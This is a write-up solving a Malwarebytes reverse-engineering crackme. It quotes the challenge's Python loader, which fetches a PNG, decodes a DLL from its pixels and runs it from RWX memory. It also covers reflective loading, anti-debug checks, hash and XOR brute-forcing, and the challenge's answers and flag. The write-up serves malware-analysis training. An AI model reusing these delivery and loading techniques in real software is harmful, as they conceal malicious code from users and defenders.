Malwarebytes challenge write-up

On April 27th, Malwarebytes published a new reverse engineering challenge: a Windows executable mixing malware behavior with a traditional crackme look.

This document describes the steps taken to solve the challenge.

Lightweight analysis of “mb_crackme_2.exe”

As we would do with any real malware, we start by performing some basic information gathering on the provided executable. Although the static and dynamic approaches lead to the same conclusion about the executable’s nature (see 2.4), each method is described in the following sections.

Basic static information gathering

Using Exeinfo PE, a maintained successor of the renowned (but outdated) PEiD software, gives us some basic information about the binary:

  •  The program is a 32-bit Portable Executable (PE), meant to be run in a console (no GUI);
  •  It seems to be compiled from C++ using Microsoft Visual C++ 8;
  •  No obvious sign of packing is detected by the tool.

Output of Exeinfo PE

Looking for printable strings in the binary already gives us some hints about the executable’s nature:

$ strings -n 10 mb_crackme_2.exe_
[...]
pyi-windows-manifest-filename
[...]
Py_IgnoreEnvironmentFlag
Failed to get address for Py_IgnoreEnvironmentFlag
Py_NoSiteFlag
Failed to get address for Py_NoSiteFlag
Py_NoUserSiteDirectory
[...]
mpyimod01_os_path
mpyimod02_archive
mpyimod03_importers
spyiboot01_bootstrap
spyi_rth__tkinter
bCrypto.Cipher._AES.pyd
bCrypto.Hash._SHA256.pyd
bCrypto.Random.OSRNG.winrandom.pyd
bCrypto.Util._counter.pyd
bMicrosoft.VC90.CRT.manifest
bPIL._imaging.pyd
bPIL._imagingtk.pyd
[...]
opyi-windows-manifest-filename another.exe.manifest
[...]
zout00-PYZ.pyz
python27.dll

The many references to Python libraries, PYZ archives and the “pyi” substring indicate that the PyInstaller utility was used to build a PE executable from a Python script.
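The same check can be automated. The snippet below is a minimal sketch, assuming that a handful of the strings listed above are good enough indicators; the marker list, the helper names and the threshold are our own choices for illustration, not an official PyInstaller signature.

```python
# Hypothetical marker list, taken from the strings output above.
# It is an assumption for this sketch, not an exhaustive signature.
PYINSTALLER_MARKERS = (
    b"pyi-windows-manifest-filename",
    b"pyiboot01_bootstrap",
    b"PYZ.pyz",
    b"python27.dll",
)

def find_pyinstaller_markers(data):
    """Return the markers that occur somewhere in the raw file bytes."""
    return [m for m in PYINSTALLER_MARKERS if m in data]

def looks_like_pyinstaller(data, threshold=2):
    """Heuristic: flag the file when at least `threshold` markers are present."""
    return len(find_pyinstaller_markers(data)) >= threshold

# Usage on synthetic data (use open(path, "rb").read() for a real file).
sample = b"\x00MZ...spyiboot01_bootstrap\x00zout00-PYZ.pyz\x00python27.dll\x00"
print(find_pyinstaller_markers(sample))
print(looks_like_pyinstaller(sample))
```

A substring search is crude but sufficient for triage; a positive result only suggests PyInstaller and still has to be confirmed by extraction.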

Basic dynamic information gathering

Running the executable (in a sandboxed environment) gives us the following message:

Using Process Monitor, from the Sysinternals suite, allows us to quickly get a glimpse of the actions performed by the executable:

A temporary directory named “_MEI5282” is created under user’s “%temp%” directory, and filled with Python-related resources. In particular, “python27.dll” and “*.pyd” libraries are written and later loaded by the executable.

This behavior is typical of executables generated by PyInstaller.

Error-handling analysis

Without tools, it is often possible to quickly get information about a binary’s internals by testing its error handling. For example, inserting an EOF (End-Of-File) signal in the terminal (“Ctrl+Z + Return” on Windows Command Prompt) makes the program crash, printing the following information:
Python stack trace printed after a crash

This allows us to identify the presence of a Python program embedded inside the executable and gives us the name of the main script: another.py. The error message “[$PID] Failed to execute script $scriptName” is typical of PyInstaller-produced programs.

Python files extraction and decompilation

Every lightweight analysis presented previously indicates that the executable has been built using PyInstaller.
The PyInstaller Extractor program can be used to extract the compiled Python resources from the executable.
$ python pyinstxtractor.py mb_crackme_2.exe
[*] Processing mb_crackme_2.exe
[*] Pyinstaller version: 2.1+
[*] Python version: 27
[*] Length of package: 8531014 bytes
[*] Found 931 files in CArchive
[*] Beginning extraction...please standby
[+] Possible entry point: pyiboot01_bootstrap
[+] Possible entry point: pyi_rth__tkinter
[+] Possible entry point: another
[*] Found 440 files in PYZ archive
[*] Successfully extracted pyinstaller archive: mb_crackme_2.exe

You can now use a python decompiler on the pyc files within the extracted directory

 

As previously seen, the most interesting file is “another”, as it should contain the “main” function.
Files extracted by PyInstaller Extractor

 

A quick Internet search informs us that in a PyInstaller archive, the main script is stored as a *.pyc file (Python bytecode) from which the first 8 bytes, containing its signature, have been removed. Looking at the hex dump of another *.pyc file from the archive confirms this and gives us the correct signature for Python 2.7 bytecode files: the magic number 03 f3 0d 0a followed by a 4-byte timestamp (the first 8 bytes of cmd.pyc below).
$ hexdump -C another | head -n 3
00000000  63 00 00 00 00 00 00 00  00 03 00 00 00 40 00 00  |c............@..|
00000010  00 73 03 02 00 00 64 00  00 5a 00 00 64 01 00 5a  |.s....d..Z..d..Z|
00000020  01 00 64 02 00 5a 02 00  64 03 00 64 04 00 6c 03  |..d..Z..d..d..l.|
$ hexdump -C out00-PYZ.pyz_extracted/cmd.pyc | head -n 3
00000000  03 f3 0d 0a 00 00 00 00  63 00 00 00 00 00 00 00  |.ó......c.......|
00000010  00 03 00 00 00 40 00 00  00 73 4c 00 00 00 64 00  |.....@...sL...d.|
00000020  00 5a 00 00 64 01 00 64  02 00 6c 01 00 5a 01 00  |.Z..d..d..l..Z..|

Restoring the file’s signature produces a correct Python bytecode file.

$ cat <(printf "\x03\xf3\x0d\x0a\x00\x00\x00\x00") another > another.pyc
$ file another.pyc
another.pyc: python 2.7 byte-compiled
Using the uncompyle6 decompilation tool, we can easily recover the original source code of another.py.
$ uncompyle6 another.pyc > another.py
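The header restoration performed above with cat and printf can also be done in Python. This is a minimal sketch written for Python 3; the function name restore_pyc_header is ours, and the timestamp is simply set to zero as in the shell command.

```python
import struct

# Python 2.7 magic number (03 f3 0d 0a), as seen in the hex dump of cmd.pyc.
PY27_MAGIC = b"\x03\xf3\x0d\x0a"

def restore_pyc_header(body, timestamp=0):
    """Prepend the 8-byte Python 2.7 header (magic + 32-bit timestamp)."""
    if body[:4] == PY27_MAGIC:
        return body  # header already present, nothing to do
    return PY27_MAGIC + struct.pack("<I", timestamp) + body

# Usage with the first 16 bytes of the extracted "another" file.
stripped = bytes.fromhex("63000000000000000003000000400000")
fixed = restore_pyc_header(stripped)
print(fixed[:8].hex())  # 03f30d0a00000000
```

For the real file, the input would be read with open("another", "rb").read() and the result written to another.pyc.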

Stage 1: login

Looking at the main() function of another.py, we see that the first operations are performed by the stage1_login() function.
def main():
    key = stage1_login()
    if not check_if_next(key):
        return
    else:
        content = decode_and_fetch_url(key)
        if content is None:
            print 'Could not fetch the content'
            return -1
        decdata = get_encoded_data(content)
        if not is_valid_payl(decdata):
            return -3
        print colorama.Style.BRIGHT + colorama.Fore.CYAN
        print 'Level #2: Find the secret console...'
        print colorama.Style.RESET_ALL
        load_level2(decdata, len(decdata))
        user32_dll.MessageBoxA(None, 'You did it, level up!', 'Congrats!', 0)
        try:
            if decode_pasted() == True:
                user32_dll.MessageBoxA(None, '''Congratulations! Now save your flag
and send it to Malwarebytes!''', 'You solved it!', 0)
                return 0
            user32_dll.MessageBoxA(None, 'See you later!', 'Game over', 0)
        except:
            print 'Error decoding the flag'
        return

def stage1_login():
    show_banner()
    print colorama.Style.BRIGHT + colorama.Fore.CYAN
    print 'Level #1: log in to the system!'
    print colorama.Style.RESET_ALL
    login = raw_input('login: ')
    password = getpass.getpass()
    if not (check_login(login) and check_password(password)):
        print 'Login failed. Wrong combination username/password'
        return None
    else:
        PIN = raw_input('PIN: ')
        try:
            key = get_url_key(int(PIN))
        except:
            print 'Login failed. The PIN is incorrect'
            return None
        if not check_key(key):
            print 'Login failed. The PIN is incorrect'
            return None
        return key

Three user inputs are successively checked: the user’s login, password and PIN code.

Finding the login

The check_login() function’s code is completely transparent:
def check_login(login):
    if login == 'hackerman':
        return True
    return False

We have found the login, let’s search for the password.

Expected login

Finding the password

The check_password() function hashes the user’s input using the MD5 hash function, and compares the result with a hardcoded string:

def check_password(password):
    my_md5 = hashlib.md5(password).hexdigest()
    if my_md5 == '42f749ade7f9e195bf475f37a44cafcb':
        return True
    return False

A quick Internet search of this string gives us the corresponding cleartext password: Password123.
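When a search engine does not know the hash, a small dictionary attack is the usual fallback. The snippet below is a sketch of that alternative technique, not what was done here; the crack_md5 helper and the tiny wordlist are hypothetical, and the code targets Python 3.

```python
import hashlib

def crack_md5(target_hex, candidates):
    """Return the first candidate whose MD5 hex digest equals target_hex, else None."""
    target_hex = target_hex.lower()
    for word in candidates:
        if hashlib.md5(word.encode("utf-8")).hexdigest() == target_hex:
            return word
    return None

# Hypothetical mini wordlist; a real attack would stream a large dictionary file.
wordlist = ["123456", "letmein", "hackerman", "Password123", "qwerty"]
print(crack_md5("42f749ade7f9e195bf475f37a44cafcb", wordlist))
```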

Finding the password on a search engine

Finding the PIN code

The PIN code is read from standard input, converted into an integer (cf. stage1_login() function), and passed to the get_url_key() function:


def get_url_key(my_seed):
    random.seed(my_seed)
    key = ''
    for i in xrange(0, 32):
        id = random.randint(0, 9)
        key += str(id)
    return key

This function derives a pseudo-random 32-digit key from the PIN code, using it as a seed for Python’s PRNG. The generated key is then verified using the check_key() function, where its MD5 sum is checked against another hardcoded value.


def check_key(key):
    my_md5 = hashlib.md5(key).hexdigest()
    if my_md5 == 'fb4b322c518e9f6a52af906e32aee955':
        return True
    return False

The key space is obviously too large to be brute-forced, as a 32-digit string corresponds to 10^32 (~2^106) possible combinations. However, since the key depends only on the PIN code, which is an integer, we can brute-force the PIN instead, using the following code:


from another import get_url_key, check_key
PIN = 0
while True:
    key = get_url_key(PIN)
    if check_key(key):
        print PIN
        break
    PIN += 1

The solution is obtained in a few milliseconds:

$ python bruteforcePIN.py
9667
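The attack works because the whole 32-digit key is a deterministic function of a small seed. The snippet below is a self-contained sketch of the same idea for Python 3, with a search bound (max_pin) that we added; it checks itself against a target built from an arbitrary PIN. The digit sequence produced for a given seed may differ between Python versions, so the hardcoded hash of the challenge should be tested under Python 2.7.

```python
import hashlib
import random

def get_url_key(seed):
    """Same derivation idea as another.py: 32 decimal digits from a seeded PRNG."""
    rng = random.Random(seed)
    return "".join(str(rng.randint(0, 9)) for _ in range(32))

def brute_force_pin(target_md5, max_pin=100000):
    """Try PINs 0..max_pin-1; return the first whose derived key hashes to target_md5."""
    for pin in range(max_pin):
        key = get_url_key(pin)
        if hashlib.md5(key.encode("ascii")).hexdigest() == target_md5:
            return pin
    return None

# Self-check with a target built from a known PIN (1234 is an arbitrary example).
demo_target = hashlib.md5(get_url_key(1234).encode("ascii")).hexdigest()
print(brute_force_pin(demo_target))
```

Using a private random.Random instance instead of random.seed() avoids disturbing the global generator, which is a design choice of this sketch rather than of the original script.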

Testing credentials

Using the credentials found in the previous step completes the first stage of the challenge.

Validating stage 1

Clicking “Yes” makes the executable pause after printing the following message in the console:

Waiting for us to find a « secret console »

Let’s find that secret console!

Stage 2: the secret console

Payload download and decoding

Continuing our analysis of the main() function, the next function to be called after credentials verification is decode_and_fetch_url(), with the previously calculated 32-digit key given as argument:


def decode_and_fetch_url(key):
    try:
        encrypted_url = '\xa6\xfa\x8fO\xba\x7f\x9d\[...]\xfe'
        aes = AESCipher(bytearray(key))
        output = aes.decrypt(encrypted_url)
        full_url = output
        content = fetch_url(full_url)
    except:
        return None
    return content

A URL is decrypted using an AES cipher and the 32-digit key. The resource at this URL is then downloaded and its content returned by the function.
To get the decrypted URL, we simply add some logging instructions to the original code of another.py, which can be run independently of mb_crackme_2.exe (given that the required dependencies are present on our machine).

[...]
        full_url = output
        print "DEBUG : URL fetched is : %s " % full_url #added from original code
        content = fetch_url(full_url)
[...]

Running the modified script gives the following result:


login: hackerman
Password:
PIN: 9667
DEBUG : URL fetched is : https://i.imgur.com/dTHXed7.png

The decrypted URL hosts the PNG image displayed below:

Image downloaded by the executable

The “malware” then reads the Red, Green and Blue components of each of the image’s pixels, interprets them as bytes and constructs a buffer from their concatenation.

def get_encoded_data(bytes):
    imo = Image.open(io.BytesIO(bytes))
    rawdata = list(imo.getdata())
    tsdata = ''
    for x in rawdata:
        for z in x:
            tsdata += chr(z)
    del rawdata
    return tsdata

This technique is sometimes used by real malware to download malicious code without raising suspicion of traffic-analysis tools, hiding the real nature of the downloaded resource.
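The decoding step performed by get_encoded_data() boils down to flattening the pixel tuples. The snippet below is a minimal Python 3 sketch that works on a plain list of tuples, such as the one list(Image.getdata()) returns for an RGB image in the original code; the function name pixels_to_bytes and the two sample pixels are ours.

```python
def pixels_to_bytes(pixels):
    """Concatenate the channel values of every pixel, in order, into one byte string."""
    out = bytearray()
    for pixel in pixels:
        out.extend(pixel)  # each channel value (0-255) becomes one byte
    return bytes(out)

# Hypothetical 2-pixel RGB "image" hiding the start of a PE header.
pixels = [(0x4D, 0x5A, 0x90), (0x00, 0x03, 0x00)]
print(pixels_to_bytes(pixels))  # b'MZ\x90\x00\x03\x00'
```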
Using the “Extract data…” function of the Stegsolve tool allows us to quickly preview the data encoded in the image, which appears to be a PE file (and more specifically, a DLL):

Output of the stegsolve tool

The function is_valid_payl() is then used to check whether the decoded payload is correct:


def is_valid_payl(content):
    if get_word(content) != 23117:
        return False
    next_offset = get_dword(content[60:])
    next_hdr = content[next_offset:]
    if get_dword(next_hdr) != 17744:
        return False
    return True

The 23117 and 17744 constants represent the “MZ” and “PE” magic bytes present in the headers of a PE.


>>> import struct
>>> struct.pack("<H", 23117)
'MZ'
>>> struct.pack("<H", 17744)
'PE'
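The check can be reproduced on a synthetic header. In the sketch below (Python 3), get_word() and get_dword() are assumed to read little-endian 16-bit and 32-bit values, since their code is not shown in this write-up; the fake header is built only for the demonstration.

```python
import struct

def get_word(buf):
    """Little-endian 16-bit value at the start of buf (assumed behaviour)."""
    return struct.unpack_from("<H", buf, 0)[0]

def get_dword(buf):
    """Little-endian 32-bit value at the start of buf (assumed behaviour)."""
    return struct.unpack_from("<I", buf, 0)[0]

def is_valid_payl(content):
    if get_word(content) != 0x5A4D:                 # 23117, "MZ"
        return False
    next_offset = get_dword(content[60:])           # e_lfanew field at offset 0x3C
    if get_dword(content[next_offset:]) != 0x4550:  # 17744, "PE\0\0"
        return False
    return True

# Synthetic 0x80-byte header: "MZ", e_lfanew = 0x40, "PE\0\0" at offset 0x40.
fake = bytearray(0x80)
fake[0:2] = b"MZ"
struct.pack_into("<I", fake, 60, 0x40)
fake[0x40:0x44] = b"PE\x00\x00"
print(is_valid_payl(bytes(fake)))  # True
```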

The decoded file is then passed to the load_level2() function, which is a wrapper around prepare_stage().

def load_level2(rawbytes, bytesread):
    try:
        if prepare_stage(rawbytes, bytesread):
            return True
    except:
        return False

def prepare_stage(content, content_size):
    virtual_buf = kernel_dll.VirtualAlloc(0, content_size, 12288, 64)
    if virtual_buf == 0:
        return False
    res = memmove(virtual_buf, content, content_size)
    if res == 0:
        return False
    MR = WINFUNCTYPE(c_uint)(virtual_buf + 2)
    MR()
    return True

This function starts by allocating enough space to store the downloaded code, using the VirtualAlloc API function call. The allocated space is readable, writable and executable, as the provided arguments reveal (12288 being equal to “MEM_COMMIT | MEM_RESERVE”, and 64 to PAGE_EXECUTE_READWRITE).
The downloaded code is then written in the allocated space using the memmove function, and executed like a shellcode from offset 2.
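The two magic numbers passed to VirtualAlloc can be decoded with a few lines of Python. This is a small sketch; the constant values come from the Windows SDK headers, and the describe_alloc helper is ours.

```python
# Constants as defined in the Windows SDK headers (winnt.h).
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40

def describe_alloc(alloc_type, protect):
    """Return readable names for the VirtualAlloc arguments used by prepare_stage()."""
    names = []
    if alloc_type & MEM_COMMIT:
        names.append("MEM_COMMIT")
    if alloc_type & MEM_RESERVE:
        names.append("MEM_RESERVE")
    if protect == PAGE_EXECUTE_READWRITE:
        protection = "PAGE_EXECUTE_READWRITE"
    else:
        protection = hex(protect)
    return " | ".join(names), protection

print(describe_alloc(12288, 64))
# ('MEM_COMMIT | MEM_RESERVE', 'PAGE_EXECUTE_READWRITE')
```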

To get a clean dump of the downloaded code (once decoded), we add a piece of code in the prepare_stage() function, as follows:

def prepare_stage(content, content_size):
    with open("dumped_pe.dll", "wb") as f:
        f.write(content[:content_size])
        print "DEBUG : File dumped in dumped_pe.dll"
    virtual_buf = kernel_dll.VirtualAlloc(0, content_size, 12288, 64)
    if virtual_buf == 0:
        return False
    res = memmove(virtual_buf, content, content_size)
    if res == 0:
        return False
    MR = WINFUNCTYPE(c_uint)(virtual_buf + 2)
    MR()
    return True

After re-executing the program, we observe that the obtained file is indeed a valid 32-bit Windows DLL:

$ file dumped_pe.dll
dumped_pe.dll: PE32 executable (DLL) (console) Intel 80386, for MS Windows

Time for us to open our favorite disassembler!

Downloaded DLL’s reverse-engineering

Reflective loading
Starting at offset 2 of the file, a small shellcode located in the DOS header transfers execution to code that implements reflective DLL injection. This technique lets the library load itself from memory, instead of being loaded from disk by the LoadLibrary API call.
 

Disassembly of the first bytes of the downloaded DLL

The reflective loader’s code, located at 0x6E0, is documented in Stephen Fewer’s GitHub  and will not be described in this write-up. Since, in the end, the library is loaded by this mechanism as it would be after a normal LoadLibrary call, this downloaded file will be analyzed like a standard DLL in the rest of this write-up.

The list of exported functions being empty (except for the DllEntryPoint function), we start our analysis at the entry point of the DLL.

Exports list

Entry point
Our first goal is to locate the DllMain() function, starting from the entry point. For a reverser who is not used to analyzing Windows DLLs, a simple way to start is to open any non-stripped 32-bit DLL which, with a little luck, was compiled with the same compiler (Visual C++ ~7.10 here) and has a similar CFG structure for the DllEntryPoint function.
An example of CFG comparisons between the analyzed DLL (left) and another non-stripped 32bit DLL (right) is presented below:
 

DLLEntryPoints in our DLL v/s another non-stripped DLL
DllMainCRTStartup in our DLL / in another non-stripped DLL

This technique allows us to quickly find the DllMain function in our DLL, here being located at 0x10001170.
DllMain (0x10001170)
The function starts by checking if it has been called during the first load of the DLL by a process, by comparing the value of the fdwReason argument against the DLL_PROCESS_ATTACH constant.
The DllMain() function then registers two exception handlers using the AddVectoredExceptionHandler API call. The handlers are named “Handler_0” and “Handler_1” in the screenshot below:

DllMain function

An exception is then manually raised using the “int 3” interruption instruction, triggering the execution of Handler_0.
Interlude: debugging a DLL in IDA Pro
To make the reverse-engineering of some functions easier, debugging the code to observe function inputs and outputs can be an effective method.
One simple way to debug a DLL inside IDA is to load the file as usual, then go to “Debugger -> Process options…” and modify the following values:

  • Application:
    •  On a 64-bit version of Windows:
      •   “C:\Windows\SysWOW64\rundll32.exe” to debug a 32-bit library
      •   “C:\Windows\System32\rundll32.exe” to debug a 64-bit library
    •  On a 32-bit version of Windows:
      •   “C:\Windows\System32\rundll32.exe” to debug a 32-bit library
      •   A 64-bit library cannot be run (and therefore debugged) on a 32-bit version of Windows
  •  Parameters:
    •   “PATH_OF_YOUR_DLL”,functionToCall [function parameters if any]

Note: The file extension must be “*.dll” for rundll32.exe to accept it.

IDA « Process options… » menu

To test the configuration, just place a breakpoint at the entry point of the DLL:

Placing a breakpoint on the entry point

Run your debugger (F9). If configured correctly, your debugger should break at the DLL entry point, allowing you to debug any DLL function.

Handler_0 (0x10001260)
Looking at Handler_0’s CFG (given below), we see that the function calls two unknown functions (0x100092C0 and 0x1000E61D). To quickly identify these functions, let’s debug the DLL and look at their inputs and outputs:

sub_100092C0

Function sub_100092C0() call

The function seems to take 3 arguments:

  • A buffer (here named “Value”);
  • A value (here 0);
  • The size of the buffer (here 0x104).

Let’s look at the buffer’s content before and after the function call:

« Value » buffer before and after the call

The function prototype and its side effects correspond to the memset function.

sub_1000E61D

Function sub_1000E61D() call

The function seems to take 4 arguments:

  • An integer (here the PID of the process);
  • A buffer (here named “Value”);
  • The size of the buffer (here 0x104);
  • A value (here 0xA, or 10).

Looking at the provided buffer’s content after the function call, we see that the representation in base 10 of the first integer passed in parameter is written in the provided buffer.

Value buffer after the call

The function prototype and its side effects correspond to the _itoa_s function.

Handler_0 whole CFG and pseudo-code
Here is the graph of the Handler_0 function:

CFG of function Handler_0()

This corresponds to the following pseudo code:

if isloaded("python27.dll"):
   pid = getpid()
else:
   pid = 0
setEnvironmentVariable("mb_chall", str(pid))
return EXCEPTION_CONTINUE_SEARCH

The function checks for the presence of the python27.dll library (normally loaded by the main program mb_crackme_2.exe) in the process address space, and sets the “mb_chall” environment variable accordingly.
This may be seen as an “anti-debug” trick, because running the DLL independently in a debugger makes the execution follow a different path.

Handler_1 (0x100011D0)
The code of this handler is quite self-explanatory, being similar to the previous handler’s code:

Once again, this corresponds to the following pseudo code:

if getpid() == int(getenv("mb_chall")):
   tmp = 6
else:
   tmp = 1
exceptionInfo->Context._Eip += tmp
return EXCEPTION_CONTINUE_EXECUTION

After this handler returns, execution resumes at the address of the original “int 3” instruction plus 6 if the check passes, or plus 1 if it fails (as shown in the pseudo-code above).
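The interplay between the two handlers can be modelled in a few lines of Python. This is only a toy model of the pseudo-code given for Handler_0 and Handler_1, with the process state passed in as plain arguments; the function names and the example PID are ours.

```python
def handler_0(python_loaded, pid):
    """Model of Handler_0: value stored in the mb_chall environment variable."""
    return str(pid if python_loaded else 0)

def handler_1(pid, mb_chall):
    """Model of Handler_1: number of bytes added to EIP after the int 3."""
    return 6 if pid == int(mb_chall) else 1

# 4242 is an arbitrary example PID.
for loaded in (True, False):
    env = handler_0(loaded, 4242)
    print(loaded, env, handler_1(4242, env))
```

When python27.dll is loaded, the stored PID matches and EIP advances by 6; when the DLL is run on its own, the variable holds 0 and EIP only advances by 1.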

We thus continue the analysis at the not_fail function (0x100010D0).

not_fail (0x100010D0)
The function only starts a thread and waits for it to terminate.

CFG of not_fail() function

The created thread executes the MainThread (0x10001110) function, where our analysis continues.

MainThread (0x10001110)
The function loops and calls the EnumWindows API every second, which in turn calls the provided callback function (EnumWindowsCallback) on every window present on the desktop.

CFG of MainThread() function

EnumWindowsCallback function (0x10005750)
The function, called on each window, uses the SendMessageA API with the WM_GETTEXT message to retrieve the window’s title.

SendMessageA() call in MainThread()

After being converted to C++ std::string, the substrings “Notepad” and “secret_console” are searched in the window’s title.

Strings « Notepad » and « secret_console » searched for in window title

If both substrings are present, the window’s title is replaced by the hardcoded string “Secret Console is waiting for the commands…”, using the SendMessageA API along with the WM_SETTEXT message. The window is then brought to the foreground, using the ShowWindow API call.

Modification of the window’s title using SendMessageA()

The PID of the process corresponding to the window is then written in the “malware”’s console, and sub-windows of this window are enumerated, using the EnumChildWindows API. The function EnumChildWindowsCallback (0x100034C0) is thus called on every sub-window.

EnumChildWindows() function call
 

EnumChildWindowsCallback function (0x100034C0)
This function gets the content of the sub-window using the SendMessageA API call:

SendMessageA() call in EnumChildWindowsCallback() function

The substring “dump_the_key” is then searched in the retrieved content:

Search for « dump_the_key »

If this string is found, this function calls a decryption routine decrypt_buffer() (0x100016F0) on a buffer (encrypted_buff), using the string “dump_the_key” as argument.

Decrypting a hardcoded buffer using « dump_the_key » as key

Then, the “malware” loads the actxprxy.dll library into the process memory space. The first 4096 bytes (i.e. the first memory page) of the library are made writable using the VirtualProtect API call, and the decrypted payload is written at this location.

Loading a library and writing the decrypted buffer at its location

Since the actxprxy.dll library is not used anywhere in the analyzed DLL after being re-written, it may be seen as a covert communication channel between the analyzed DLL and the main program mb_crackme_2.exe. After this, the function clears every allocated memory and exits. The created thread (see 4.2.6) therefore also exits, and the DllEntryPoint function call terminates, giving the control back to the main python script.

Triggering the secret console

As seen in the DLL analysis, to trigger the required conditions, a file named “secret_console – Notepad” is opened in a text editor. As such, the window title contains the mentioned substrings:

Opening a file named « secret_console_Notepad.txt » on Notepad++

As expected, the title of the window is changed to “Secret Console is waiting for the commands…” by the malware. Writing “dump_the_key” in the window validates the second stage.
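The two conditions checked by the DLL can be summarised as plain substring tests. The sketch below models them in Python; the function names and the sample titles are hypothetical, and the comparison is assumed to be case-sensitive, which this write-up does not verify.

```python
def window_is_console(title):
    """Condition checked by EnumWindowsCallback: both substrings appear in the title."""
    return "Notepad" in title and "secret_console" in title

def child_triggers_dump(text):
    """Condition checked by EnumChildWindowsCallback on the sub-window content."""
    return "dump_the_key" in text

# Hypothetical window titles as they might appear on a desktop.
for title in ("secret_console - Notepad",
              "Untitled - Notepad",
              "secret_console.txt - Notepad++"):
    print(title, "->", window_is_console(title))
```

Because only substrings are tested, any editor whose title bar shows both the file name and the word “Notepad” satisfies the first condition.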

Writing « dump_the_key » in the text editor

Stage 3: the colors

After validating the previous step, a message is printed on the console, asking the user to “guess a color”:

Level 3 Message

The three components (R, G and B) of a specific color, with values going from 0 to 255, need to be entered to validate this step.

Level 3 failed guess message

Understanding the code

Looking back at the main() function of another.py, it seems that the corresponding operations are performed inside the decode_pasted() function.


def main():
   [...]
      load_level2(decdata, len(decdata))
      user32_dll.MessageBoxA(None, 'You did it, level up!', 'Congrats!', 0)
      try:
         if decode_pasted() == True:
            user32_dll.MessageBoxA(None, '''Congratulations! Now save your flag and 
send it to Malwarebytes!''', 'You solved it!', 0)
            return 0
   [...]

def decode_pasted():
    my_proxy = kernel_dll.GetModuleHandleA('actxprxy.dll')
    if my_proxy is None or my_proxy == 0:
        return False
    else:
        char_sum = 0
        arr1 = my_proxy
        str = ''
        while True:
            val = get_char(arr1)
            if val == '\x00':
                break
            char_sum += ord(val)
            str = str + val
            arr1 += 1

        print char_sum
        if char_sum != 52937:
            return False
        colors = level3_colors()
        if colors is None:
            return False
        val_arr = zlib.decompress(base64.b64decode(str))
        final_arr = dexor_data(val_arr, colors)
        try:
            exec final_arr
        except:
            print 'Your guess was wrong!'
            return False

        return True

 


def dexor_data(data, key):
    maxlen = len(data)
    keylen = len(key)
    decoded = ''
    for i in range(0, maxlen):
        val = chr(ord(data[i]) ^ ord(key[i % keylen]))
        decoded = decoded + val
    return decoded

def level3_colors():
    colorama.init()
    print colorama.Style.BRIGHT + colorama.Fore.CYAN
    print '''Level #3: Your flag is almost ready! But before it will be revealed
, you need to guess it's color (R,G,B)!'''
    print colorama.Style.RESET_ALL
    color_codes = ''
    while True:
        try:
            val_red = int(raw_input('R: '))
            val_green = int(raw_input('G: '))
            val_blue = int(raw_input('B: '))
            color_codes += chr(val_red)
            color_codes += chr(val_green)
            color_codes += chr(val_blue)
            break
        except:
            print 'Invalid color code! Color code must be an integer (0,255)'
    print 'Checking: RGB(%d,%d,%d)' % (val_red, val_green, val_blue)
    return color_codes

According to the decode_pasted() function, the decrypted buffer stored at the start of actxprxy.dll’s address space is read and:

  • base64-decoded;
  • zlib-decompressed;
  • XOR’ed against the user-provided colors values;
  • Executed by the Python exec function.
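The pipeline listed above can be exercised end to end on a toy payload. The snippet below is a Python 3 sketch: xor_bytes() is a bytes-based equivalent of dexor_data(), while encode_stage() is an inverse that we assume for the demonstration only. The colors and the payload are arbitrary examples, not the challenge’s values.

```python
import base64
import zlib

def xor_bytes(data, key):
    """Repeating-key XOR, the bytes equivalent of dexor_data()."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def encode_stage(source, rgb):
    """Inverse pipeline (assumed, demo only): XOR, compress, base64-encode."""
    return base64.b64encode(zlib.compress(xor_bytes(source, rgb)))

def decode_stage(blob, rgb):
    """Pipeline of decode_pasted(): base64-decode, decompress, XOR with the colors."""
    return xor_bytes(zlib.decompress(base64.b64decode(blob)), rgb)

# Arbitrary example colors and payload.
rgb = bytes([10, 200, 33])
blob = encode_stage(b"print('hello')", rgb)
print(decode_stage(blob, rgb))  # b"print('hello')"
```

The decompression does not depend on the colors, which is why the XOR’ed buffer can be dumped once and attacked offline.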

To start our cryptanalysis, we modify the decode_pasted() function to dump the val_arr buffer before the dexor_data() operation, and rerun another.py, providing all required credentials:

[...]
if colors is None:
   return False
val_arr = zlib.decompress(base64.b64decode(str))
with open("val_arr.bin", "wb") as f:
   f.write(val_arr)
   print "val_arr dumped !"
exit()
final_arr = dexor_data(val_arr, colors)
[...]

 

Dumping the XOR’ed array

Decrypting the val_arr buffer

Knowing that the buffer is a string passed to the “exec” Python statement after being decrypted, it should be valid Python source code.
To find the right key, the naïve solution would be to run a brute-force attack on all the possible “(R, G, B)” combinations, and look for printable solutions. This solution would need to perform 256^3 = 16’777’216 dexor_data() calls, which is feasible but inefficient.
Instead, we perform 3 independent brute-force attacks, one for each of the R, G and B components, for a total of 256 x 3 = 768 candidate values to test. Each attack works on a different “slice” of the val_arr string (every third byte, starting at offset 0, 1 or 2). We then test each combination of the candidate values found for each component.
For example, if our 3 brute-force attacks indicate that:

  • R can take values 2 and 37,
  • G can take values 77 and 78,
  • and B can only take the value 3,

Then we test the combinations (2, 77, 3), (37, 77, 3), (2, 78, 3) and (37, 78, 3).

The following code implements our attack:


import string
import itertools
from colorama import *
from another import dexor_data

with open("val_arr.bin", "rb") as f:
    val_arr = f.read()

# lists of possible values for R, G and B
potential_solutions = [list(), list(), list()]
for color in range(3):  # separate brute-force on R, G and B
    for xor_value in range(256):  # testing all potential values
        valid = True
        # extract one character out of every 3, starting at index "color"
        # (i.e. all characters XORed with the same "color" value)
        for b in val_arr[color::3]:
            if chr(ord(b) ^ xor_value) not in string.printable:
                valid = False
                break
        if valid:
            potential_solutions[color].append(xor_value)

print "Possible values for R, G and B :", potential_solutions

for colors in itertools.product(*potential_solutions):
    print "Testing ", colors
    plaintext = dexor_data(val_arr, map(chr, colors))
    print repr(plaintext)
    if not raw_input("Does it seem right? [Y/n]\n").startswith("n"):
        print "Executing payload :"
        exec plaintext
        break

Executing this code gives us the solution instantly:

Decrypting the payload

The final flag appears in the console:


flag{"Things are not always what they seem; the first appearance 
deceives many; the intelligence of a few perceives what has been 
carefully hidden." - Phaedrus}

Conclusion

This challenge was very interesting to solve, because apart from being an original crackme, it also included various topics that could be found during a real malware analysis. These topics included:

  • DLL-rewriting techniques, here used as a kind of covert communication channel between a DLL and its main process;
  • “Non-obvious” anti-debugging tricks, like checking the presence of a known library in the process’ memory space to identify standalone DLL debugging;
